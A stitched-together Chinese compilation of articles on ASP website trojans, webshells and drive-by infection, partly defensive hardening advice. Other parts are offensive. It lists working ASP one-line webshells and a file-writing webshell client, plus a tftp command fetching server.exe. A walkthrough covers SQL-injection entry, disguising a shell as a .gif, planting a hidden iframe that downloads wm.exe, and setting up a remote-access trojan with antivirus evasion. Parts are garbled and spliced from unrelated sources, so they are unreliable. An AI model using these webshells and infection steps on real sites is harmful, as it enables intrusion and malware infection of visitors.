ASP网站数据库被挂木马的处理办法
网站漏洞修复方案
网站漏洞修复方案1. 引言网站作为企业在线展示和与用户交互的重要渠道,具有重要的商业价值。
然而,许多网站存在漏洞,这些漏洞可能被恶意攻击者利用,导致用户数据泄露、网站遭到篡改或服务不可用等安全问题。
因此,修复网站漏洞至关重要,以确保网站的安全性和可靠性。
本文将介绍一些常见的网站漏洞,以及应对这些漏洞的修复方案。
修复网站漏洞不是一次性的任务,而是一个持续的过程,需要网站管理员和开发人员密切合作,采取多种策略来确保网站的安全。
2. 常见的网站漏洞以下是几个常见的网站漏洞:2.1 SQL注入漏洞SQL注入是一种常见的攻击方式,攻击者通过构造恶意的SQL查询语句,从应用程序的数据库中获取敏感信息或修改数据。
为了修复SQL注入漏洞,可以采取以下措施:•使用参数化查询或预编译语句来过滤用户输入的数据,确保输入的数据不会被误解为SQL代码。
•对所有用户输入的数据进行严格的验证和过滤,避免特殊字符和关键字被插入到SQL查询语句中。
•限制数据库用户的权限,确保他们只能访问必要的数据和功能,最小化潜在的损失。
2.2 跨站脚本漏洞(XSS)跨站脚本漏洞是指攻击者通过注入恶意脚本代码,使得网站在用户浏览器中执行这些脚本,从而实现盗取用户信息、修改网页内容等攻击行为。
为了修复跨站脚本漏洞,可以采取以下措施:•对用户输入的数据进行严格的验证和过滤,确保特殊字符被转义或移除。
•使用内容安全策略(Content Security Policy)来限制网页中脚本的执行范围,只允许来自指定域名的脚本执行。
•使用HTTPOnly属性来限制脚本对Cookie的访问,防止攻击者窃取用户的会话信息。
2.3 跨站点请求伪造漏洞(CSRF)跨站点请求伪造漏洞是指攻击者通过伪造用户的请求,使得用户在不知情的情况下执行意想不到的操作。
为了修复跨站点请求伪造漏洞,可以采取以下措施:•在用户进行重要操作时,要求用户提供额外的验证信息,例如输入密码、验证码等。
网站常见三种漏洞攻击及防范方法[试题]
国内外黑客组织或者个人为牟取利益窃取和篡改网络信息,已成为不争的事实,在不断给单位和个人造成经济损失的同时,我们也应该注意到这些威胁大多是基于Web网站发起的攻击,在给我们造成不可挽回的损失前,我们有必要给大家介绍几种常见的网站漏洞,以及这些漏洞的防范方法,目的是帮助广大网站管理者理清安全防范思绪,找到当前的防范重点,最大程度地避免或减少威胁带来的损失。
1、SQL语句漏洞也就是SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。
有效防范手段:对于SQL注入问题的一般处理方法是账户最小权限原则。
以下几种方法推荐使用:对用户输入信息进行必要检查对一些特殊字符进行转换或者过滤使用强数据类型限制用户输入的长度需要注意:这些检查要放在server运行,client提交的任何东西都是不可信的。
使用存储过程,如果一定要使用SQL语句,那么请用标准的方式组建SQL 语句。
比如可以利用parameters对象,避免用字符串直接拼SQL命令。
当SQL 运行出错时,不要把数据库返回的错误信息全部显示给用户,错误信息经常会透露一些数据库设计的细节。
2、网站挂马挂马就是在别人电脑里面(或是网站服务器)里植入木马程序,以盗取一些信息或者控制被挂马的电脑做一些不法的勾当(如攻击网站,传播病毒,删除资料等)。
网页挂马就是在网页的源代码中加入一些代码,利用漏洞实现自动下载木马到机器里。
网站挂马的形式可分为框架挂马、数据库挂马、后台挂马、服务器挂马以及其他形式的挂马方式。
有效防范手段:要防止网站被挂马,可以采取禁止写入和目录禁止执行的功能,这两项功能相组合,就可以有效地防止 ASP木马。
此外,网站管理员通过FTP上传某些数据,维护网页时,尽量不安装asp的上传程序。
网站挂马的整改措施_0
网站挂马的整改措施篇一:网站漏洞整改报告网站漏洞整改报告按照国家《中华人民共和国计算机信息系统安全保护条例》、《计算机信息网络国际联网安全保护管理办法》、《互联网安全保护技术措施规定》等有关法律法规规定,全面落实互联网安全保护制度和安全保护技术措施,对网站、信息安全进行了严格漏洞安全检查工作。
本次网站安全检查是完全站在攻击者角度,模拟黑客可能使用的攻击技术和漏洞发现技术进行的安全性测试,通过结合多方面的攻击技术进行测试,发现本校个别网站系统存在比较明显的可利用的安全漏洞,针对已存在漏洞的系统需要进行重点加固。
本次检查结果和处理方案如下:篇二:网站挂马附录:网站安全常见问题挂马攻击挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码(通常是通过iFrame、Script引用来实现),当用户访问该网页时,嵌入的恶意代码利用浏览器本身的漏洞、第三方activeX漏洞或者其它插件(如Flash、PdF插件等)漏洞,在用户不知情的情况下下载并执行恶意木马。
挂马方式目前挂马的主要方式是通过iFrame与Script嵌入网马URL,比如下面的挂马代码:这里通过将iFrame的width与height设置为0,使得嵌入的网马URL在网页上不可见。
这里Script里的URL是经过URLencode 编码的。
通过各种编码、混淆、客户端判断等方式来隐藏、保护网马是攻击者挂马常用的手段。
除了这两种常见的挂马方式外,还有如下几种:1、利用JavaScript执行各种经过编码、混淆的攻击代码进行挂马。
2、利用网页跳转、弹出新窗口等方式进行挂马。
3、利用Flash 等媒体封装的方式进行挂马。
4、在cSS(层叠样式表)里可以执行JavaScript的浏览器中进行挂马。
挂马常见类型常见的几种类型如下:1、数据库挂马1/13附录:网站安全常见问题攻击者利用SQL注入漏洞将挂马代码注入到数据库的某些字段中,如果网站页面使用到这些字段的值,并且没做适当的过滤,就有可能导致用户访问该网站的页面时执行攻击者注入的代码。
ASP中连接数据库的错误解决办法,ASP 编程中 20 个非常有用的例子
/download/info /1701.htm/Program/Asp/112 TM562008.html<%dim ConnStringset conn=server.CreateObject("adodb.connection")ConnString="provider=microsoft.jet.oledb.4.0;data source=" & server.MapPath("#kucun.mdb") conn.open ConnString'连接数据库%>2000下使用asp访问数据库时,在conn.open始终发生8007007f错误,重装IIS和access均得不到解决。
我在网上查到的解决办法是将oledb32.dll 解压到以下两个目录,然后重启服务器:1) C:\WINNT\system32\dllCache2) C:\Program Files\Common Files\System\OLE DB<%dim conn,exec,rsset conn=server.createobject("adodb.connetion")conn.open "driver={microsoft access driver(*.mdb)};dbq="&server.mappath("show.mdb")exec="select * from list"set rs=server.createobject("adodb.recordset")rs.open,exec,conn,1,1%>ASP中连接数据库的错误解决新解决办法Provider 错误80004005 未指定的错误的新解决办法.这两天运行的好好的点击统计程序突然出错了,显示的就是:------------------------------------------Provider 错误80004005未指定的错误------------------------------------------在网上找了一大圈,发现大家提供的办法我都试过了,没有一个有作用的.方法有以下:1.开始运行regsvr32 jscript.dll (命令功能:修复Java动态链接库)开始运行regsvr32 vbscript.dll(命令功能:修复VB动态链接库)开始运行iisreset (命令功能:重启IIS)开始运行msjetoledb40.dll2.给系统临时文件夹%windir%/temp/ 加上IUSR_COMPUTER 用户的读写权限3.ASP连接Access数据库的时候,如果频繁刷新页面,出现80004005 未指定错误,数据库不能连接,但是过大约10多分钟后再刷新就可以连接。
常见ASP一句话木马分析及防御
常见ASP一句话木马分析及防御作者:罗婷罗芳来源:《电子技术与软件工程》2013年第22期摘要什么是一句话木马?一句话木马本身并不是任何黑客程序,只是在很多网站上都会使用到的普通代码。
一句话木马只是网络攻击当中的一个小块,但通过对其防御可以大大减少相关的攻击。
【关键词】木马分析木马防御很多制作网站的朋友经常会听到一句话:“我的网站又被一句话木马入侵了。
”但什么是一句话木马?一句话木马本身并不是任何黑客程序,只是在很多网站上都会使用到的普通代码。
但这个代码会给网站打开一个缺口,通过这个缺口黑客可以将真正的木马,也就是通常所说的“大马”注入到网站服务器当中。
“大马”注入到网站服务器后,可通过控制整个网站的所有的源代码,其中程序修改或删除网站的其它内容。
如果一不小心注入的是网站服务器,那么影响的就不是一个网站,而是整个网站服务器上的所有网站。
黑客通常通过google网站查找到全部ASP类型的网站。
然后,在留言板或文章发表区域等可以将内容上传到服务器上的地方输入一句话木马。
也就是想办法将一句话木马程序代码添加到网站的后台数据库。
目前在当下黑客经常使用的ASP一句话木马主要有下面几种:(1)<% execute(request("value")) %>(2)<% execute request("value") %>(3)<% eval request("value ") %>(4)<% eval request(value) %>通过语法变形后还有下列几种:(1)<% If Request("value")<>"" Then Execute(Request("value"))%>(2)(3)<% eval(Request.Item["value"],"unsafe");%>如果再继续完善后,甚至可以绕过网站漏洞筛查程序,在这里不作说明。
ASP 木马 Webshell之安全防范解决办法
1、首先我们来看看一般ASP木马、Webshell所利用的ASP组件有那些?我们以海洋木马为列:
<object runat="server" id="ws" scope="page" classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8">
hehe,这下我们清楚了危害我们WEB SERVER IIS的最罪魁祸首是谁了!!开始操刀,come on...
2:解决办法:
① 删除或更名以下危险的ASP组件:
WScript.Shell、WScript.Shell.1、work、work.1、adodb.stream、Shell.application
ASP 木马 Webshell之安全防范解决办法
ASP 木马 Webshell之安全防范解决办法
Security Fuard Solution Of ASP Webshell
信息来源:[S.S.R.E.T] [F.N.S.T]
③ 直接反注册、卸载这些危险组件的方法:(实用于不想用①及②类此类烦琐的方法)
卸载wscript.shell对象,在cmd下或直接运行:regsvr32 /u %windir%\system32\WSHom.Ocx
卸载FSO对象,在cmd下或直接运行:regsvr32.exe /u %windir%\system32\scrrun.dll
此文原始发布地址:/docs/Microsoft_Win_ASP_Webshell_Security.htm
网站被上传木马怎样处理
网站被上传木马怎样处理有时会收到客户反映他们的网站被黑,或者网站被上传了木马,当用户拜访网站时就会下载病毒或木马,杀毒软件就弹出了病毒的提示。
这种状况是以下2种情况导致的:第一种状况:客户网站上存在文件上传漏洞,致使黑客能够运用这些漏洞,上传黑客文件。
然后黑客能够对该用户网站一切文件进行恣意修正,这种状况出现比较遍及。
对于这种状况,用户就需要找相关的技术人员。
检查出网站漏洞并完全修正,并检查网站是不是还有黑客躲藏的歹意文件。
缘由:许多网站都有文件上传功用,例如许多网站需要发布产品图像等。
文件上传功用本来就有严厉的限制。
例如:允许用户只能上传Jpg,Gif等图像。
但由于程序开发人员思考不严谨,或许直接是调用一些通用的文件上传组件,致使没对文件上传进行严厉的检查。
处理:处理的关键是要让用户自个知道网站哪些地方运用到了文件上传功用。
重点对于这个文件上传功用进行检查,并且要对网站一切文件进行检查,排查可疑信息。
同时利用网站日志,对文件被修正的时间进行检查:1、查到哪个文件被加入了代码:用户要检查自个页面代码。
依据被加入了代码的位子,确定到底是哪个页面被黑,通常黑客会去修改数据库衔接文件或网站顶部/底部的文件,由于修改后用户网站一切页面都会被附加代码。
2、查到被篡改文件后,运用Ftp检查文件最终被修正时间,例如Ftp里边检查到conn.asp文件被黑,最终修正时间是2008-05-16 03:41分,那么能够确定在2008年5月16日03:41分这个时间,有黑客使用他留下的黑客后门,篡改了您的conn.asp这个文件。
注意:1、许多用户网站被黑后,只是将被串改的文件修正过来,或从新上传,这样做并没有多大效果。
假如网站不修正漏洞,黑客很快会再次运用这漏洞的,对用户网站再次侵略。
2、网站漏洞的检查和修正需要一定的技术人员才能处理。
用户需先做好文件的备份。
第二种状况:用户本地机器中毒了,修改了用户自个本地的网页文件后,用户自个将这些页面文件上传到服务器空间上。
ASP.NET木马及Webshell安全解决方案
木马及Webshell安全解决方案木马及Webshell安全解决方案原始发布地址:/docs/Microsoft_Win_ _Webshell_Security.htm此文讨论地址:/Html/2006-12/30/10353601331.shtm l 文章简介:本文将为大家介绍在Microsoft Win系列的2003 SERVER IIS6.0中如何简单快速解决中的危险漏洞与隐患对WEB服务器系统的安全威胁之详细防范设置步骤;读完本文,您将可以使您的网站服务器免去 木马、Webshell所面对的提升权限、跨站攻击、甚至危害到系统安全的威胁。
ASP木马、Webshell之安全防范解决办法正文内容:(注意:本文所讲述之设置方法与环境:适用于Microsoft Windows Server 2003 SERVER | IIS6.0)引子:大家都知道网上出现过诸如《虚拟主机的重大隐患》等类似介绍的漏洞以及相应的黑客攻击办法的文章,以及诸如Webadmin.aspx类的Webshell,如果您拿去到您的虚拟主机上测试时您就知道,这东东对C盘有读取权限,以及对整个硬盘都有修改、删除权限;那这样的话,我们的网站、我的服务器还有什么安全可言?在黑客频频攻击的今天,我们不能不为我们的服务器而担忧...漏洞原因:大家知道ASP中常用的标准组件:FileSystemObject,这个组件为ASP提供了强大的文件系统访问能力,可以对服务器硬盘上的任何有权限的目录和文件进行读写、删除、改名等操作。
FSO对象来自微软提供的脚本运行库scrrun.dll中。
而在中这个问题仍然存在,并且更加难以解决;因为.Net中对系统IO操作功能更加强大,如:组件不再需要用Regsvr32来注册,而是直接在bin目录下就可以直接用了,所以这些功能对开发程序有很大方便是,但却使安全变得更为复杂了....(需进一步了解可参考《虚拟主机的重大隐患》原文)解决方案:大家都知道,Asp类木马可以通过对IIS中的虚拟主机采用独立匿名用户来控制FSO组件的安全,让其只能在站类活动,而不能跨站或者危害到其它硬盘的数据(注:如果您不明白可以参考一下本人以前的两篇文章《FSO安全隐患解决办法》;《ASP木马Webshell之安全防范解决办法》) Asp的安全问题与设置这里不再作讨论,下面我们开始着手木马/WebShell防范方法的讲解:一、在IIS6.0中,WEB应用程序的工作进程为以进程标识“Network Service”运行。
asp一句话木马原理分析
asp⼀句话⽊马原理分析通过HTTP协议来访问⼀句话⽊马的使⽤范围(我只列举了2种):1)只有数据库备份的情况数据库备份成asp⽂件时候,不出现“ 编译错误,缺少脚本关闭标志%>"2)SA权限的时候,⼀般先写⼊⼀句话,图个⽅便..(当然,直接tftp上传鸽⼦运⾏,那更快)tftp -i ip get server.exe⼀句话⽊马<%execute request("a")%>的原理:⾸先知道execute()函数,是⽤来执⾏asp代码的.就是负责执⾏我们上传的⼤马,将马交由asp.dll解析.上⾯的代码<%execute request("a")%>可以这样来解释:<%if request("a")<>"" then execute request("a")%>如果a不为空的时候执⾏.执⾏什么呢?...if a != 0下⾯我们来看⼀下客户端:<form action=http://192.168.0.28/shell.asp method=post><textarea name=l cols=120 rows=10 width=45>set lP=server.CreateObject("Adodb.Stream") '创建Adodb.Stream组件..lP.OpenlP.Type=2lP.CharSet="gb2312"lP.writetext request("p")lP.SaveToFile server.mappath("dbbak.asp"),2lP.Closeset lP=nothingresponse.redirect "dbbak.asp"</textarea><textarea name=p cols=120 rows=10 width=45>要提交的数据</textarea><BR><center><br><input type=submit value=提交>Adodb.Stream负责上传读取数据到服务器:组件:"Adodb.Stream"有下列⽅法:Cancel ⽅法使⽤⽅法如下Object.Cancel说明:取消执⾏挂起的异步 Execute 或 Open ⽅法的调⽤。
网站中病毒或者有木马的处理方法是什么
网站中病毒或者有木马的处理方法是什么电脑病毒看不见,却无处不在,有时防护措施不够或者不当操作都会导致病毒入侵网站被黑或者是被上传木马是比较常见的,也是用户比较关注的一个问题,因为用户在访问网站的时候会自动下载病毒或者木马,如果有杀毒软件的话,就会有相关的提示,网站被黑或者被上传木马主要有以下两种情况方法步骤1.网站存在文件上传漏洞,黑客会利用这样的漏洞,上传一些黑客文件。
上传之后黑客就可以对该网站的所有文件进行任意修改,这种目前比较常见的一种情况。
针对这种情况, 只能找专业的技术人员进行检查,检查出网站漏洞并彻底修复,并且将一些黑客上传的隐藏恶意文件给修复。
原因: 很多网站都需要使用到文件上传功能,例如很多网站需要发布产品图片等。
文件上传功能本来应该具有严格的限定。
例如:只允许用户只能上传JPG,GIF等图片。
但由于程序开发人员考虑不严谨,或者直接是调用一些通用的文件上传组件, 导致没对文件上传进行严格的检查。
处理: 处理关键是要用户自己知道自己网站哪些地方使用到了文件上传功能。
重点针对这个文件上传功能进行检查, 同时针对网站所有文件进行检查,排查可疑信息。
同时也利用网站日志,对文件被修改时间进行检查:(1)查到哪个文件被加入代码: 用户要查看自己网页代码。
根据被加入代码的位置,确定到底是哪个页面被黑, 一般黑客会去修改数据库连接文件或网站顶部/底部文件,因为这样修改后用户网站所有页面都会被附加代码。
(2) 查到被篡改文件后,使用Ftp查看文件最后被修改时间, 例如Ftp 里面查看到conn.asp文件被黑,最后修改时间是 2015-12-22 10:34 分, 那么可以确定在2015-12-22日10:34 分这个时间有黑客使用他留下的黑客后门,篡改了你的conn.asp这个文件。
注意:(1)很多用户网站被黑后,只是将被串改的文件修正过来。
或重新上传, 这样是没多大作用。
如果网站不修复漏洞。
黑客可以很快再次利用这漏洞,对用户网站再次入。
常见网站安全漏洞及解决方案
常见网站安全漏洞及解决方案随着互联网的发展,越来越多的人开始使用网站进行各种操作,如购物、社交、金融等。
但是,网络安全风险也在不断增加,很多网站面临着各种安全漏洞。
为了保障用户信息的安全,网站管理员需要注意常见的安全漏洞并采取相应的措施加以解决。
一、SQL注入攻击SQL注入攻击是指黑客利用漏洞通过输入恶意代码或脚本来访问数据库,导致数据库被攻击者篡改,从而破坏或者获取网站内部敏感信息的攻击手法。
例如,黑客通过特定的输入字符串直接访问数据库,使得数据库中的信息毫无保留地被窃取。
为了避免SQL注入攻击,网站管理员需要对输入的数据进行有效的过滤和验证,并将输入的数据与数据库中的数据进行比对,防止恶意攻击者通过SQL注入手法破坏网站数据。
二、跨站脚本攻击(XSS)跨站脚本攻击是指黑客通过前端网站中的恶意脚本,将输入到网站中的信息传输到服务器上,导致信息泄露或被篡改。
例如,黑客在网页中进行脚本注入,用户在该网页进行输入操作时,使得输入的信息被恶意脚本篡改,从而导致信息的损失和泄露。
为了防止跨站脚本攻击,网站管理员需要在前端进行有效的过滤和验证,并对输入数据进行必要的转义处理,防止恶意攻击者通过脚本注入手法破坏网站数据。
三、密码被盗密码被盗是指本应该保密的密码被他人获取,从而导致账户信息被盗窃。
黑客获取密码的方式有多种,例如通过钓鱼网站或钓鱼邮件来获取用户密码,或者利用社交网络关系来获取用户的密码。
为了避免密码被盗,用户需要加强自身的安全意识,不轻易泄露个人密码。
同时,网站管理员需要建立有效的账户安全机制,如定期更改密码、设定强密码限制、采用二步验证等方式来提高账号安全性。
四、DDoS攻击DDoS攻击是指通过恶意攻击者将大量的数据流量强加到服务器上,导致其失去功能,从而瘫痪网站的攻击手法。
例如,黑客借助僵尸网络大量向服务器发送请求,导致服务器无法正常工作并瘫痪。
为了避免DDoS攻击,网站管理员需要在服务器上设置有效的安全防护系统,如Web防火墙、资源分配器等,及时发现和拦截恶意请求,提高网站的安全性和稳定性。
网站挂马
网站挂马1,扫描准备入侵的网站·寻找注射点·使用的工具NBSI3.02,进入后台后,找一个可以上传文件的地方·比如说添加新闻·任何动态网站都会有添加新闻的功能的·3,上传小马abc.asp 一般的网站都会不允许直接上传.asp格式的文件,但允许上传.gif等图片的格式,因此先将abc.asp改为abc.gif,, 上传··然后检测一下是否上传成功4.这里表示小马已经上传成功了··然后我们通过修改备份数据库··来将Abc.gif改为.asp后缀格式的注意当前数据库路径前面两个点不能掉~!『确定』5.数据库备份成功~!然后通过浏览器访问如下URL/admin/Databackup/fuck.aspfuck.asp 是自己开始定义的名字·我们打开如下小马界面:6.接下来我们上传大马:上传成功后,在浏览器中访问大马7.这样我们就得到了WEBSHELL 了~~!接下来我们可以通过功能8FSO文件浏览操作器到主页上写入一句话木马,,给自己留个后门,或者直接在网页上写入一个网页跳转·<iframe src=/wm.exe width=0 height=0></iframe>这句话的意思就是,当有人访问我们准备入侵的网站的网页时(如:),它会自动打开一个我自己另外一个网站,上面的我绑定了木马的网页:wm.exe在这里我们可以通过MS06014这个IE漏洞利用程序讲我们的木马和网页绑定这里的muma.exe可以是直接绑定的木马也可以绑定的‘下载者’程序,他们之间的区别就在于,如果是直接绑定的木马,当用于访问被挂马的网站时,同时打开我的网页,由于我设置的高和宽都为0 ,所以我们肉眼看不见而已,开车我们网页后他就直接下载我们的木马··如果木马体积比较大的话,很容易造成浏览器假死的现象,因此这里可以将‘下载者’这个程序和我的网页绑定,这样,当用户访问被入侵的网站时,它会自动将体积很小的下载者下下来·然后自动运行··然后下载者的功能就是去下载我们真正的木马~!这样,不但不会造成浏览器的假死··还可以穿透防火墙,8.这里的木马我们可以配置一个鸽子,加免杀配置鸽子:1.首先架设一个FTP服务器和WEB服务器,或者你可以用公网的申请一个免费的空间这里表示我已经架设好了WEB和FTP服务器了··我的WEB,FTP服务器地址为192.168.200.3网站为我挂马的WEB服务器地址为192.168.200.2网站为2配置鸽子的自动上线··如下下面IP文件内容的地址我写错了··应该就是运行我鸽子主程序的地址192.168.200.1 这是我本机(真实机)2.接下来配置服务程序这里的通知地址我写的我的网站域名,因为真实的环境IP是变动的,但域名不会变,因此我们可以搞一个花生壳动态域名绑定·这样我们就不用再担心IP变动的这个情况了~!一般在公网上挂马也就是写的自己的空间域名地址~!9.这样我们的鸽子的服务端就已经生成了···然后再按文章开头前面的方法··将鸽子挂到网上去~~!整个的一个思路是,访问被挂马的网站自动从我的空间上下载用户――――――――下载者――――――――――木马(鸽子)实验成功了,,如下。
用ASP程序写注入扫描及木马查杀[脚本语言也不弱]
'****************************************************
Dimvar_Table,var_UserField,var_PassField,var_UserLen,var_PassLen,var_Username,var_Password
SelectCasestrer
Case"pause"
re="扫描速度缓冲!"
IfGetSession("ScanPause")<>"yes"Thenresponse.write"<metahttp-equiv='refresh'content='1;url=?'>"
var_MaxLen=16 '用户名及密码最大长度设置,可修改。
var_PauseTime=10 '执行检测事缓冲速度设置,建议设置为5-20左右,数字越小检测越频繁。
'####################################################
%>
<divclass="space"></div>
<divclass="Block">
<divclass="BlockBar">扫描报告</div>
<divclass="BlockMain">
ASP木马的攻击与防护策略探究
ASP木马的攻击与防护策略探究摘要:目前,ASP木马的攻击与防护问题引起了人们越来越广泛地关注。
在实践中,我们要采取各项切实有效的措施,加强ASP木马的实效性。
具体而言,我们既要控制上传,又要防范SQL注入;既要进行服务器设置,又要形成良好的编程习惯。
关键词:ASP 木马网络安全近些年,随着社会经济以及网络技术的不断发展,ASP木马的攻击与防护问题引起了人们越来越广泛地关注。
在新的网络环境中,人们对浏览网络工具、管理页面、交互页面等都提出了更高的要求。
在这种情况下,各类基于脚本语言技术开发的网站呈现出不断上升的趋势。
然而,这种趋势的背后却埋藏着巨大的网络安全隐患。
网站的后门工具Webshell的数量在不断增加,功能也在不断强大。
在实践中,Webshell可以穿越防火墙的阻碍,进而实现控制网站服务器的目的。
这是它最大的优点,同时也是我们克服的最大难点。
目前,ASP技术给人们带来了诸多便利,但是,ASP木马却给人们带来了诸多烦恼。
如何做好ASP木马的防护工作,是我们不得不面对的一项重点课题和难点课题。
基于以上的论述,本文从Webshell的内涵与分类、ASP木马工作原理、ASP木马防范三个角度,对该问题进行了深入地分析与研究。
1、Webshell的内涵与分类简单地说,webshell就是网络入侵者控制网站服务器的一种脚本攻击工具。
它的基本流程是这样的:网络入侵者入侵一个网站后,经常会将各种木马后门文件放在网站服务器的web目录内,使其与正常的网页文件搅混在一起。
然后,网络入侵者可以通过这些木马后门文件控制网站服务器,进行下载文件、执行任意程序、查看数据库等操作。
Webshell有很强的隐蔽性,这是它的一个显著特点。
在入侵过程中,由于webshell与网站服务器或远程主机通过80端口传递数据,而这种传递不会被防火墙所拦截。
所以,它可以顺利地穿越防火墙,实现入侵的目的。
根据动态脚本的不同,Webshell会有不同的分类。
浅说ASP木马病毒及其防治
中 图分 类 号 : P 0 5 T 3 9.
文 献 标 识 码 : A
文章 编 号 : 7 -3 9 ( 0 o o () 0 -0 1 7 1 2 1 ) 6c一0 1 62 7 1
AS P木 马 其 实 就 是 用ASP程 序 编 写 的 自 己站 点 中 上 传 什 么样 的 程 序 , 及 每 个 以 网站 程 序 , 至 有 些 AS 木 马 本 身 就 是 由 甚 P 程 序 是 否存 在 漏 洞 , 因此 无 法 防 止 入 侵 者 As P网站 管 理 程 序 修 改而 来 的 。 它和 其 他 利 用站 点 中客 户 程 序 本 身 漏 洞 上 传 AS 木 P AS P程 序 并 没 有 存在 本 质 区 别 , 要 是 能 马 的 行 为 。 间 商 只 能 防 止 入 侵 者 利 用 已 只 空 够 运 行 AS 的 空 间就 能 运 行 它 , 种 特 性 被 入 侵 的站 点 再 次 入 侵 同一 服 务 器 上 其 他 P 这 使 得 AS 木 马 非 常 不 易 被 发 觉 。 和 其 他 站 点 的 行 为 。 也 更 加 说 明要 防 范 ASP木 P 它 这 AS P程 序 的 区 别 仅 仅 在 于 ASP木 马 是 入 侵 者 上 传 到 目标 空 间 , 帮 助 入 侵 者 控 制 目 并 标 空 间 的AS 程 序 。 P …因 此 , 户 要 想 在 自 用
信 息 技 术
SlC &T H LG CNE E N 0Y E C0 .
皿圆 Leabharlann 浅 说 ASP木 马病 毒 及 其 防治
网络安全应急预案应对网络木马攻击的有效方法
网络安全应急预案应对网络木马攻击的有效方法网络安全是当今社会中不可或缺的一部分,而网络木马攻击是网络安全面临的主要威胁之一。
网络木马是一种恶意软件,能够悄悄地侵入计算机系统并执行恶意操作。
为了有效地应对网络木马攻击,建立一套完善的网络安全应急预案至关重要。
本文将论述应对网络木马攻击的有效方法,并介绍网络安全应急预案的重要性。
一、网络安全应急预案网络安全应急预案是指在遭受网络攻击时所采取的一系列应对措施和应急处理流程。
它为组织和个人提供了应对网络攻击的指导方针,帮助其在网络威胁出现时快速反应,并尽快控制和消除安全风险。
网络安全应急预案的制定需要经过全面的分析和评估,确保能够应对各种不同类型的网络攻击。
二、有效方法应对网络木马攻击1. 定期更新和升级安全软件安全软件是保护计算机免受网络木马攻击的重要工具。
定期更新和升级安全软件(如杀毒软件、防火墙等)能够及时识别和抵御新型网络木马,提高计算机系统的安全性。
2. 加强网络安全意识培训提高用户的网络安全意识是有效预防网络木马攻击的重要方法。
组织开展网络安全培训,教育员工关于网络安全的基本知识、防范技巧和警惕意识,帮助他们避免点击恶意链接、下载可疑附件等危险行为。
3. 控制网络权限和访问控制限制用户的网络权限和访问控制是有效防止网络木马攻击的关键措施。
建立严格的权限管理,仅向有合法需求的用户授权网络资源访问权限,防止恶意用户通过木马程序获取敏感信息或操纵系统。
4. 隔离网络环境和数据备份将网络环境分为不同的区域,限制不同区域之间的通信,可以控制网络木马的传播和扩散。
此外,定期进行数据备份,确保数据的完整性和可恢复性,以防止木马攻击导致数据损失。
5. 及时检测和应对攻击建立实时监控系统,及时检测异常网络活动和潜在的木马攻击。
一旦发现异常行为,应立即采取相应的措施,如禁用被感染的计算机、隔离网络、迅速修复漏洞等,以最大限度地减少损失。
6. 参与信息共享和合作网络木马攻击往往不受地域限制,国际合作和信息共享对于打击网络木马攻击至关重要。
学校ASP网站漏洞及防范
学校ASP网站漏洞及防范[摘要]目前浏阳的很多学校都建立了自己的网站,但都是基于ASP和Access的,很多的网站是直接从网上下载的,有着很多网站的注入通病。
[关键词]浏阳网站数据库攻击由于ASP的方便易用,越来越多的网站后台程序都使用ASP脚本语言。
但是,由于ASP本身存在一些安全漏洞,稍不小心就会给攻击者提供可乘之机。
目前ASP+ACCESS网站的主要安全隐患来自Access数据库的安全性,其次在于ASP网页设计过程中的安全漏洞,也就是没有把很多关键词进行过滤。
一、漏洞解析1、用户名与口令被破解用户名与口令,往往是攻击者们最感兴趣的东西,如果被通过某种方式看到源代码,后果是严重的,我们的网站很快就会被攻击者占据。
2、 ASP木马有些网站允许用户上传文件,但必需对这些上传文件十分小心,为什么论坛程序被攻破后主机也随之被攻击者占据。
原因就在于可能存在ASP木马,它能把一个文件随便放到你论坛的程序中,进而整个网站被攻击者占据。
3、 inc文件泄露问题当存在ASP的主页正在制作且没有进行最后调试完成以前,可以被某些搜索引擎机动追加为搜索对象。
如果这时候有人利用搜索引擎对这些网页进行查找,会得到有关文件的定位,并能在浏览器中查看到数据库地点和结构的细节,并以此揭示完整的源代码。
4、特殊字符输入框是黑客利用的一个目标,他们可以通过输入脚本语言等对用户客户端造成损坏;如果该输入框涉及数据查询,他们会利用特殊查询语句,得到更多的数据库数据,甚至表的全部。
因此必须对输入框进行过滤。
但如果为了提高效率仅在客户端进行输入合法性检查,仍有可能被绕过。
5、 Access数据库的存储隐患在ASP+Access应用系统中,如果获得或者猜到Access数据库的存储路径和数据库名,则该数据库就可以被下载到本地。
例如:对于网上书店的Access数据库,人们一般命名为book.mdb、store.mdb 等,而存储的路径一般为“URL/database”或干脆放在根目录(“URL/”)下。
asp一句话木马入侵网站实战
asp一句话木马网站入侵实战成功今天给大家讲述的是asp一句话木马网站入侵实战。
实验环境是在实验室模拟老师的电脑入侵自己的asp网站成功,时间201210月13号,地点实验室。
入侵目标是将此网站主页标题中“云计算中心”变更成“一句话木马入侵实战成功”,接下来就由我在此抛砖引玉的开头吧,在讲述本次入侵的开头,我还是按照惯例给他家补充一下知识,为了是大家跟好的理解这次asp一句话木马网站入侵实战。
给大家补充几个知识点:第一什么是一句话木马黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:<%execute request("value")%><%eval request("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。
(不知道数据库也可以,只要知道<%eval request("value")%>这个文件被插入到哪一个ASP文件里面就可以了。
)这就被称为一句话木马,它是基于B/S结构的第二就是漏洞苍蝇不盯无缝的蛋,入侵者只要找到复杂的计算机网络中的一个缝,就能轻而易举地闯入系统。
所以,了解这些缝都有可能在哪里,对于修补它们至关重要。
通常,裂缝主要表现在软件编写存在bug、系统配置不当、口令失窃、明文通讯信息被监听以及初始设计存在缺陷等方面。
漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。
具体举例来说,比如在Intel Pentium芯片中存在的逻辑错误,在Sendmail早期版本中的编程错误,在NFS 协议中认证方式上的弱点,在Unix系统管理员设置匿名Ftp服务时配置不当的问题都可能被攻击者使用,威胁到系统的安全。
因而这些都可以认为是系统中存在的安全漏洞第三就是本次实验就是建立在已知网站的数据库的路径下,且以asp格式保存下这个为漏洞。
php网站被挂木马后的修复方法总结
php⽹站被挂⽊马后的修复⽅法总结本⽂实例总结了php⽹站被挂⽊马后的修复⽅法。
分享给⼤家供⼤家参考。
